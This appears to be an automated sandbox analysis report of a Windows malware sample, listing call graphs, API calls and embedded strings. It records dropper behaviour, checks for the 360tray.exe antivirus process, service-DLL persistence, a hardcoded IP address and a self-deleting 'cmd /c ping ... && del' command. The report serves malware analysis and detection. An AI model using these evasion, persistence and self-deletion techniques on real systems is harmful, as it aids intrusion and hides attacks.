                                                                                                                execution_graph 411 40c000 413 40c044 GetPEB 411->413 414 40c077 CreateFileA 413->414 416 40c265 414->416 417 40c22d 414->417 418 40c246 WriteFile 417->418 419 40c244 417->419 420 40c255 CloseHandle WinExec 418->420 419->420 420->416 528 402ac0 #800 529 402240 534 402270 #693 #641 529->534 531 40224f 532 402262 531->532 535 401de0 #825 531->535 534->531 535->532 537 401d80 542 401db0 #815 537->542 539 401d8f 540 401da2 539->540 543 401de0 #825 539->543 542->539 543->540 544 401fc6 559 402400 IsIconic 544->559 546 401ff2 547 401ffa #470 546->547 548 4020af 546->548 550 40201a 547->550 563 402470 #2379 548->563 560 4023d0 SendMessageA 550->560 551 4020ba 553 402028 GetSystemMetrics GetSystemMetrics 554 402046 553->554 561 402420 GetClientRect 554->561 556 402055 562 4023a0 DrawIcon 556->562 558 40209e #755 558->551 559->546 560->553 561->556 562->558 563->551 564 4010ce 567 401db0 #815 564->567 566 4010db 567->566 568 402b0f #755 569 402550 #693 570 402572 569->570 571 402569 569->571 573 401de0 #825 571->573 573->570 421 4028d2 __set_app_type __p__fmode __p__commode 422 402941 421->422 423 402955 422->423 424 402949 __setusermatherr 422->424 433 402a42 _controlfp 423->433 424->423 426 40295a _initterm __getmainargs _initterm 427 4029ae GetStartupInfoA 426->427 429 4029e2 GetModuleHandleA 427->429 434 402a60 #1576 429->434 432 402a06 exit _XcptFilter 433->426 434->432 576 4020dc 579 4023d0 SendMessageA 576->579 578 4020f1 579->578 580 40109e 585 4010ad 580->585 591 40107d #561 585->591 587 4010a6 588 4010bc 587->588 592 40289c 588->592 591->587 595 402870 592->595 594 4010ab 596 402885 __dllonexit 595->596 597 402879 _onexit 595->597 596->594 597->594 598 4024a0 EnableWindow 599 402aa1 600 402aa6 599->600 603 402a78 #1168 600->603 604 402a92 _setmbcp 603->604 605 402a9b 603->605 604->605 606 402b22 609 4022c0 #800 606->609 612 402510 #641 609->612 611 402300 612->611 613 402a24 _exit 614 401eed 617 402490 614->617 616 401f00 #2302 617->616 619 401e70 #324 626 402530 #567 619->626 621 401eac 627 402310 #1168 621->627 623 401ec3 628 4024e0 #1146 LoadIconA 623->628 625 401eca 626->621 627->623 628->625 629 402af0 #641 630 402b70 633 402510 #641 630->633 632 402b78 633->632 435 401134 #2621 Sleep GetCommandLineA strstr Sleep 436 401305 10 API calls 435->436 437 4011bf wsprintfA 435->437 438 4013e2 CloseHandle Sleep GetProcAddress 436->438 439 4013cd GetLastError 436->439 497 401c18 6 API calls 437->497 448 40142d Sleep ExpandEnvironmentStringsA Sleep GetFileAttributesA 438->448 439->438 441 4013da 439->441 443 401212 lstrcpyA 446 401c18 8 API calls 443->446 444 4012db 503 401b6b 9 API calls 444->503 447 401247 wsprintfA 446->447 450 401c18 8 API calls 447->450 451 4014e2 GetTickCount wsprintfA Sleep 448->451 452 401466 448->452 455 4012d7 450->455 482 401aee 451->482 456 401491 #537 452->456 458 401478 ExpandEnvironmentStringsA 452->458 453 4012fe 453->441 455->444 465 401aee 4 API calls 455->465 504 4016eb 456->504 458->451 460 401528 514 401b6b 9 API calls 460->514 461 40153a Sleep 487 401794 LoadLibraryA GetProcAddress GetProcAddress GetProcAddress CreateToolhelp32Snapshot 461->487 465->444 466 4014e0 466->458 469 4015e0 Sleep GetProcAddress 472 401609 469->472 474 40160b 469->474 470 4016b3 471 4016d0 Sleep 470->471 496 401b6b 9 API calls 470->496 471->441 515 40187b LoadLibraryA GetProcAddress GetProcAddress GetProcAddress GetProcAddress 472->515 473 4016a6 FreeLibrary 473->470 474->472 474->473 478 401629 474->478 478->473 479 401688 480 401691 FreeLibrary 479->480 481 40169e Sleep 479->481 480->481 481->473 483 401b06 482->483 484 401b2f memcpy 483->484 486 40151f 483->486 521 401000 CreateFileA 484->521 486->460 486->461 488 401804 Process32First 487->488 489 401858 CloseHandle 487->489 490 401832 488->490 491 4015b2 LoadLibraryA 489->491 492 401868 FreeLibrary 489->492 490->489 493 401838 lstrcmpiA 490->493 495 401821 Process32Next 490->495 491->469 491->470 492->491 493->490 494 40184d 493->494 494->489 495->490 496->471 498 401ce4 497->498 499 401d14 lstrcpyA 498->499 500 401ce8 498->500 499->500 501 40120a 500->501 502 401d5b FreeLibrary 500->502 501->443 501->444 502->501 503->453 526 401e60 504->526 506 401713 _access 507 401722 506->507 508 4014bc #800 GetFileAttributesA 506->508 507->508 509 401730 #5683 #4129 507->509 508->451 508->466 510 4016eb 509->510 511 401763 #800 510->511 527 401e60 511->527 513 40177a _mkdir 513->508 514->441 516 40190f GetTickCount wsprintfA 515->516 518 401958 516->518 519 401972 FreeLibrary 518->519 520 401636 wsprintfA 518->520 519->520 520->479 522 401030 WriteFile 521->522 523 40102c 521->523 524 401052 CloseHandle 522->524 525 40104e 522->525 523->522 524->486 525->524 526->506 527->513 634 4020f5 #355 #2515 635 402166 634->635 636 40214f 634->636 647 402580 SendMessageA 635->647 637 4022c0 2 API calls 636->637 639 402161 637->639 640 402174 #540 #2818 641 4021a2 640->641 648 4025b0 #3998 641->648 643 4021b5 #3499 649 401e60 643->649 645 4021eb #6907 #800 #800 646 4022c0 2 API calls 645->646 646->639 647->640 648->643 649->645 650 401f35 #4710 659 402440 SendMessageA 650->659 652 401f58 660 402440 SendMessageA 652->660 654 401f6c #3996 661 4025e0 SendMessageA 654->661 656 401f93 #3996 662 4025e0 SendMessageA 656->662 658 401fbd 659->652 660->654 661->656 662->658 664 402af9 #693

                                                                                                                Callgraph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                • Opacity -> Relevance
                                                                                                                • Disassembly available
                                                                                                                callgraph 0 Function_00402AC0 1 Function_00401E40 2 Function_00402440 3 Function_00402240 29 Function_00401DE0 3->29 41 Function_00402270 3->41 4 Function_004022C0 63 Function_00402510 4->63 5 Function_004024C0 6 Function_00402A42 7 Function_00402B43 8 Function_0040C044 9 Function_00401FC6 13 Function_00402350 9->13 16 Function_004023D0 9->16 38 Function_00402470 9->38 43 Function_00402370 9->43 52 Function_00402400 9->52 70 Function_00402420 9->70 73 Function_00402320 9->73 74 Function_004023A0 9->74 82 Function_00402330 9->82 10 Function_004020C8 11 Function_00402ACC 12 Function_004010CE 83 Function_00401DB0 12->83 14 Function_00402550 14->29 15 Function_00402B50 17 Function_00401DD0 18 Function_004028D2 18->6 21 Function_00402A57 18->21 27 Function_00402A60 18->27 19 Function_00402A54 20 Function_00402AD6 22 Function_00402B59 23 Function_004020DC 23->16 24 Function_004010DD 25 Function_00402ADF 26 Function_00401E60 28 Function_004024E0 30 Function_004025E0 31 Function_00401063 32 Function_00401A63 57 Function_00401983 32->57 33 Function_00401B6B 34 Function_004016EB 34->26 34->34 71 Function_00401E20 34->71 35 Function_0040106D 36 Function_00401EED 61 Function_00402490 36->61 37 Function_00401AEE 37->24 37->32 51 Function_00401000 37->51 39 Function_00401E70 39->28 62 Function_00402310 39->62 81 Function_00402530 39->81 40 Function_00402870 42 Function_00402AF0 44 Function_00402B70 44->63 45 Function_004020F5 45->4 45->26 56 Function_00402580 45->56 84 Function_004025B0 45->84 46 Function_00402A78 47 Function_00402AF9 48 Function_00402B79 49 Function_0040187B 50 Function_0040107D 53 Function_00401E00 54 Function_0040C000 54->8 55 Function_00401D80 55->29 55->83 58 Function_00402B05 59 Function_00402B0F 60 Function_00401E10 64 Function_00401794 65 Function_00401C18 88 Function_00401D3A 65->88 66 Function_00402B18 67 Function_00401F1B 68 Function_0040289C 68->40 69 Function_0040109E 79 Function_004010AD 69->79 89 Function_004010BC 69->89 71->1 72 Function_004024A0 75 Function_00402AA1 75->46 76 Function_00402B22 76->4 77 Function_00402A24 78 Function_00401F25 79->50 80 Function_00402B2E 85 Function_00401134 85->33 85->34 85->37 85->49 85->64 85->65 86 Function_00401F35 86->2 86->30 87 Function_00402B37 89->68

                                                                                                                Executed Functions

                                                                                                                Function 0040C044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171fileprocessCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 60 40c044-40c074 GetPEB 61 40c077-40c09a 60->61 62 40c09d-40c0a0 61->62 63 40c0a6-40c0bc 62->63 64 40c1ee-40c22b CreateFileA 62->64 65 40c110-40c116 63->65 66 40c0be-40c0c5 63->66 88 40c265-40c269 64->88 89 40c22d-40c230 64->89 69 40c118-40c11f 65->69 70 40c129-40c12f 65->70 66->65 67 40c0c7-40c0ce 66->67 67->65 71 40c0d0-40c0d7 67->71 69->70 72 40c121-40c124 69->72 73 40c131-40c138 70->73 74 40c148-40c14e 70->74 71->65 78 40c0d9-40c0dd 71->78 80 40c1bb-40c1c0 72->80 73->74 75 40c13a-40c141 73->75 76 40c150-40c157 74->76 77 40c167-40c16f 74->77 75->74 81 40c143-40c146 75->81 76->77 84 40c159-40c160 76->84 85 40c171-40c178 77->85 86 40c188-40c18e 77->86 78->65 87 40c0df-40c0e3 78->87 82 40c1e0-40c1e9 80->82 83 40c1c2-40c1c5 80->83 81->80 82->62 83->82 90 40c1c7-40c1ca 83->90 84->77 91 40c162-40c165 84->91 85->86 92 40c17a-40c181 85->92 94 40c190-40c197 86->94 95 40c1a7-40c1ad 86->95 87->80 93 40c0e9-40c10b 87->93 96 40c232-40c238 89->96 90->82 99 40c1cc-40c1cf 90->99 91->80 92->86 100 40c183-40c186 92->100 93->61 94->95 101 40c199-40c1a0 94->101 95->80 102 40c1af-40c1b6 95->102 97 40c246-40c252 WriteFile 96->97 98 40c23a-40c242 96->98 105 40c255-40c262 CloseHandle WinExec 97->105 98->96 104 40c244 98->104 99->82 106 40c1d1-40c1d4 99->106 100->80 101->95 108 40c1a2-40c1a5 101->108 102->80 103 40c1b8 102->103 103->80 104->105 105->88 106->82 109 40c1d6-40c1d9 106->109 108->80 109->82 110 40c1db-40c1de 109->110 110->64 110->82
                                                                                                                APIs
                                                                                                                • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040C223
                                                                                                                • WriteFile.KERNELBASE(00000000,FFFF6661,00003E00,?,00000000), ref: 0040C252
                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 0040C256
                                                                                                                • WinExec.KERNEL32(?,00000005), ref: 0040C262
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateExecHandleWrite
                                                                                                                • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$XekSuT.exe$athA$catA$dleA$el32$lstr$odul
                                                                                                                • API String ID: 3741012433-1337179472
                                                                                                                • Opcode ID: eb1dc1aab9616a873a9176c867fcb90dca47bb34ce89b5d6d60bc17a18132d92
                                                                                                                • Instruction ID: 4eef44a04be80027630e64d62b81b4b0f7cb2a7a9c358aa5d242a05e89df5a28
                                                                                                                • Opcode Fuzzy Hash: eb1dc1aab9616a873a9176c867fcb90dca47bb34ce89b5d6d60bc17a18132d92
                                                                                                                • Instruction Fuzzy Hash: F461F574D01215DBCF24CF94C884AAEB7B0BB48715F2582ABD405BB782C7789E81CF99
                                                                                                                Function 00401794 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 67libraryloaderprocessCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 111 401794-401802 LoadLibraryA GetProcAddress * 3 CreateToolhelp32Snapshot 112 401804-40181f Process32First 111->112 113 401858-401866 CloseHandle 111->113 114 401832-401836 112->114 115 401872-401878 113->115 116 401868-40186c FreeLibrary 113->116 114->113 117 401838-40184b lstrcmpiA 114->117 116->115 118 401856 Process32Next 117->118 119 40184d-401854 117->119 118->114 119->113
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004017A8
                                                                                                                • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 004017BA
                                                                                                                • GetProcAddress.KERNEL32(?,Process32First), ref: 004017CF
                                                                                                                • GetProcAddress.KERNEL32(?,Process32Next), ref: 004017E1
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004017F5
                                                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 00401819
                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 0040182C
                                                                                                                • lstrcmpiA.KERNEL32(00000000,?), ref: 00401843
                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 0040185C
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0040186C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryProcess32$CloseCreateFirstFreeHandleLoadNextSnapshotToolhelp32lstrcmpi
                                                                                                                • String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
                                                                                                                • API String ID: 653906424-4285911020
                                                                                                                • Opcode ID: 1fd417c11413756bd4715d1432974552d424e7ffcafe747e360662e6f791f9bc
                                                                                                                • Instruction ID: e698cd54efef0762fd02a762dd22e0b3df5000b7872fc78e3db917c3bca36737
                                                                                                                • Opcode Fuzzy Hash: 1fd417c11413756bd4715d1432974552d424e7ffcafe747e360662e6f791f9bc
                                                                                                                • Instruction Fuzzy Hash: 39210E75D41218EFDB10EFA0D949BEEBBB8FB48301F10846AE505B2290D7749B80CF54
                                                                                                                Function 00401B6B Relevance: 24.5, APIs: 9, Strings: 5, Instructions: 48librarythreadloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(shell32.dll,?), ref: 00401B80
                                                                                                                • GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 00401B98
                                                                                                                • __p__pgmptr.MSVCRT ref: 00401BBA
                                                                                                                • sprintf.MSVCRT ref: 00401BCF
                                                                                                                • GetCurrentProcess.KERNEL32(00000100), ref: 00401BDD
                                                                                                                • SetPriorityClass.KERNELBASE(00000000), ref: 00401BE4
                                                                                                                • GetCurrentThread.KERNEL32 ref: 00401BEC
                                                                                                                • SetThreadPriority.KERNELBASE(00000000), ref: 00401BF3
                                                                                                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00401C10
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentPriorityThread$AddressClassExecuteLibraryLoadProcProcessShell__p__pgmptrsprintf
                                                                                                                • String ID: /c ping 127.0.0.1 -n 1 && del /f/q "%s"$ShellExecuteA$cmd.exe$open$shell32.dll
                                                                                                                • API String ID: 239697722-3584563708
                                                                                                                • Opcode ID: 7249951d3074dcb4a7fe4bb46aef8e51ce1700dc43be1304f4320e222d999fe6
                                                                                                                • Instruction ID: 03b7caf6ff0ed763f8f9b181b84943af9cfe637eb8e7dbc85a8f0fb9157acd93
                                                                                                                • Opcode Fuzzy Hash: 7249951d3074dcb4a7fe4bb46aef8e51ce1700dc43be1304f4320e222d999fe6
                                                                                                                • Instruction Fuzzy Hash: 5A11A171E44208ABEB109FA4DD0ABD9BB7CAB08702F0000B5F645F61D1CBF45A848F69
                                                                                                                Function 00401134 Relevance: 115.8, APIs: 42, Strings: 24, Instructions: 337sleeplibraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 401134-4011b9 #2621 Sleep GetCommandLineA strstr Sleep 1 401305-4013cb Sleep LoadLibraryA GetProcAddress Sleep LoadLibraryA GetProcAddress Sleep GetProcAddress wsprintfA CreateMutexA 0->1 2 4011bf-40120c wsprintfA call 401c18 0->2 3 4013e2-401464 CloseHandle Sleep GetProcAddress Sleep ExpandEnvironmentStringsA Sleep GetFileAttributesA 1->3 4 4013cd-4013d8 GetLastError 1->4 9 401212-4012d9 lstrcpyA call 401c18 wsprintfA call 401c18 2->9 10 4012df 2->10 18 4014e2-401526 GetTickCount wsprintfA Sleep call 401aee 3->18 19 401466-40146d 3->19 4->3 6 4013da-4013dd 4->6 8 4016da-4016ea 6->8 26 4012db 9->26 27 4012dd-4012ee call 401aee 9->27 13 4012f3-401300 call 401b6b 10->13 13->8 30 401528-401535 call 401b6b 18->30 31 40153a-4015b4 Sleep call 401794 18->31 23 401491-4014de #537 call 4016eb #800 GetFileAttributesA 19->23 24 40146f-401476 19->24 23->18 37 4014e0 23->37 24->23 28 401478-40148f ExpandEnvironmentStringsA 24->28 26->13 27->13 28->18 30->8 40 4015c0-4015da LoadLibraryA 31->40 41 4015b6 31->41 37->28 42 4015e0-401607 Sleep GetProcAddress 40->42 43 4016b3-4016ba 40->43 41->40 46 401609 42->46 47 40160b-401612 42->47 44 4016d0-4016d8 Sleep 43->44 45 4016bc-4016c3 43->45 44->8 45->44 48 4016c5-4016cb call 401b6b 45->48 49 40162b-40168f call 40187b wsprintfA 46->49 50 4016a6-4016ad FreeLibrary 47->50 51 401618-401627 47->51 48->44 58 401691-401698 FreeLibrary 49->58 59 40169e-4016a0 Sleep 49->59 50->43 51->49 56 401629 51->56 56->50 58->59 59->50
                                                                                                                APIs
                                                                                                                • #2621.MFC42 ref: 00401162
                                                                                                                • Sleep.KERNELBASE(00000000), ref: 0040116A
                                                                                                                • GetCommandLineA.KERNEL32 ref: 00401170
                                                                                                                • strstr.MSVCRT ref: 00401188
                                                                                                                • Sleep.KERNELBASE(00000000), ref: 004011AF
                                                                                                                • wsprintfA.USER32 ref: 004011DE
                                                                                                                  • Part of subcall function 00401C18: memset.MSVCRT ref: 00401C59
                                                                                                                  • Part of subcall function 00401C18: memset.MSVCRT ref: 00401C69
                                                                                                                  • Part of subcall function 00401C18: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 00401C76
                                                                                                                  • Part of subcall function 00401C18: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 00401C8E
                                                                                                                  • Part of subcall function 00401C18: GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 00401CA3
                                                                                                                  • Part of subcall function 00401C18: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 00401CB8
                                                                                                                  • Part of subcall function 00401C18: FreeLibrary.KERNEL32(00000000), ref: 00401D62
                                                                                                                • lstrcpyA.KERNEL32(SySyeu,?,80000002,?,DisplayName,00000001,System Reta Da miula), ref: 0040121E
                                                                                                                  • Part of subcall function 00401C18: lstrcpyA.KERNEL32(?,?), ref: 00401D1F
                                                                                                                • wsprintfA.USER32 ref: 0040125A
                                                                                                                • Sleep.KERNEL32(00000000), ref: 00401307
                                                                                                                • LoadLibraryA.KERNELBASE(shell32.dll), ref: 00401312
                                                                                                                • GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 0040132A
                                                                                                                • Sleep.KERNELBASE(00000000), ref: 00401338
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00401343
                                                                                                                • GetProcAddress.KERNEL32(?,CreateMutexA), ref: 0040135B
                                                                                                                • Sleep.KERNELBASE(00000001), ref: 00401369
                                                                                                                • GetProcAddress.KERNEL32(?,ReleaseMutex), ref: 0040137B
                                                                                                                • wsprintfA.USER32 ref: 004013A4
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 004013B8
                                                                                                                • GetLastError.KERNEL32 ref: 004013CD
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004013F6
                                                                                                                • Sleep.KERNEL32(00000000), ref: 004013FE
                                                                                                                • GetProcAddress.KERNEL32(?,GetVersionExA), ref: 00401410
                                                                                                                • Sleep.KERNEL32(00000000), ref: 0040142F
                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(%ALLUSERSPROFILE%\Application Data\DRM\,?,00000104), ref: 00401446
                                                                                                                • Sleep.KERNEL32(00000000), ref: 0040144E
                                                                                                                • GetFileAttributesA.KERNELBASE(?), ref: 0040145B
                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(%Temp%\,?,00000104), ref: 00401489
                                                                                                                • #537.MFC42(?), ref: 0040149E
                                                                                                                  • Part of subcall function 004016EB: _access.MSVCRT ref: 00401714
                                                                                                                • #800.MFC42(?,?), ref: 004014C9
                                                                                                                • GetFileAttributesA.KERNEL32(?,?,?), ref: 004014D5
                                                                                                                • GetTickCount.KERNEL32 ref: 004014E2
                                                                                                                • wsprintfA.USER32 ref: 004014FC
                                                                                                                • Sleep.KERNEL32(00000000), ref: 00401507
                                                                                                                • Sleep.KERNEL32(00000000,00000000), ref: 00401546
                                                                                                                • LoadLibraryA.KERNELBASE(00000000,360tray.exe), ref: 004015C7
                                                                                                                • Sleep.KERNELBASE(00000000), ref: 004015E2
                                                                                                                • GetProcAddress.KERNEL32(00000000,Install), ref: 004015F4
                                                                                                                • wsprintfA.USER32 ref: 00401662
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00401698
                                                                                                                • Sleep.KERNEL32(00000000), ref: 004016A0
                                                                                                                • FreeLibrary.KERNELBASE(00000000), ref: 004016AD
                                                                                                                • Sleep.KERNELBASE(00000000), ref: 004016D2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep$AddressProc$Library$wsprintf$Load$Free$AttributesEnvironmentExpandFileStringslstrcpymemset$#2621#537#800CloseCommandCountCreateErrorHandleLastLineMutexTick_accessstrstr
                                                                                                                • String ID: "%s",MainThread$%ALLUSERSPROFILE%\Application Data\DRM\$%Temp%\$%s%d.dll$%s:%d:%s$119.91.152.151$360tray.exe$CreateMutexA$Description$DisplayName$GUpdate$GetVersionExA$Install$ReleaseMutex$SYSTEM\CurrentControlSet\Services\%s$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll$ShellExecuteA$SySyeu$System Reta Da miula$kernel32.dll$open$rundll32.exe$shell32.dll
                                                                                                                • API String ID: 2440389195-1842670322
                                                                                                                • Opcode ID: 33c2655f0df4c5bdb74095cc6ef8f893952d5ebb8828a241915ac991c88762e1
                                                                                                                • Instruction ID: 3e4d9021d073eed2ebaccca2140894c21fcc0a3ec56120faac2ae3b4723efbfb
                                                                                                                • Opcode Fuzzy Hash: 33c2655f0df4c5bdb74095cc6ef8f893952d5ebb8828a241915ac991c88762e1
                                                                                                                • Instruction Fuzzy Hash: 68E17E70945258DFEB20DB64CD49BDEBB79AB44306F0041EAE109B62E1CB795F84CF29
                                                                                                                Function 004028D2 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 122 4028d2-402947 __set_app_type __p__fmode __p__commode call 402a57 125 402955-4029ac call 402a42 _initterm __getmainargs _initterm 122->125 126 402949-402954 __setusermatherr 122->126 129 4029e8-4029eb 125->129 130 4029ae-4029b6 125->130 126->125 133 4029c5-4029c9 129->133 134 4029ed-4029f1 129->134 131 4029b8-4029ba 130->131 132 4029bc-4029bf 130->132 131->130 131->132 132->133 135 4029c1-4029c2 132->135 136 4029cb-4029cd 133->136 137 4029cf-4029e0 GetStartupInfoA 133->137 134->129 135->133 136->135 136->137 138 4029e2-4029e6 137->138 139 4029f3-4029f5 137->139 140 4029f6-402a23 GetModuleHandleA call 402a60 exit _XcptFilter 138->140 139->140
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705893114.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_gE4NVCZDRk.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 801014965-0
                                                                                                                • Opcode ID: c6672fdfefc484d33459fe495202c256ca6675a5ab502eee85e92a4fdfc38f08
                                                                                                                • Instruction ID: 41b20fb36615245da369ed675267998572c4bc05a5f1d3210e4b8a6eebd3b03a
                                                                                                                • Opcode Fuzzy Hash: c6672fdfefc484d33459fe495202c256ca6675a5ab502eee85e92a4fdfc38f08
                                                                                                                • Instruction Fuzzy Hash: 1C415DB1A40308AFDB209FA4DA49A5ABFA8AB09711F20017FF451B73E1D7B84941CB59
                                                                                                                Function 00401000 Relevance: 4.5, APIs: 3, Instructions: 35fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 143 401000-40102a CreateFileA 144 401030-40104c WriteFile 143->144 145 40102c 143->145 146 401052-401062 CloseHandle 144->146 147 40104e 144->147 145->144 147->146
                                                                                                                APIs
                                                                                                                • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0040101D
                                                                                                                • WriteFile.KERNELBASE(000000FF,004032A0,00006600,?,00000000), ref: 00401044
                                                                                                                • CloseHandle.KERNELBASE(000000FF), ref: 00401056
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1705727404.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1705695243.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705801801.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705822362.000000000040B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1705840310.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
